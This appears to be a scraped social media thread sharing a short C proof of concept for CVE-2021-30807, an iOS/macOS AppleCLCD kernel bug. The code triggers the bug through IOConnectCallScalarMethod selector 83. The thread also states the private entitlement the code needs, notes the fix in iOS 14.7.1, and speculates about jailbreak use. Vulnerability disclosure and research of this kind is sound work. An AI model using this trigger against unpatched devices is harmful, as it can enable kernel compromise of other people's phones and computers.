CVE-2021-30807 POC:
int main(){
io_service_t s = IOServiceGetMatchingService(0, IOServiceMatching("AppleCLCD"));
io_connect_t c;
IOServiceOpen(s,mach_task_self(),0,&c);
uint64_t a[1] = {0xFFFFFFFF};
uint64_t b[1] = {0};
uint32_t o = 1;
IOConnectCallScalarMethod(c,83,a,1,b,&o);
}
Conversation
Replying to
Make sure you have "com.apple.private.allow-explicit-graphics-priority" entitlement and IOKit headers imported.
Patch for this bug was released with iOS 14.7.1 less than 2 hours ago. Might be useful for a jailbreak but not sure due to the entitlement check.
5
24
131
1
1
Replying to
When will the jailbreak be downloaded without a computer? I hope it will be soon, God willing. Good luck and thank you
1
2









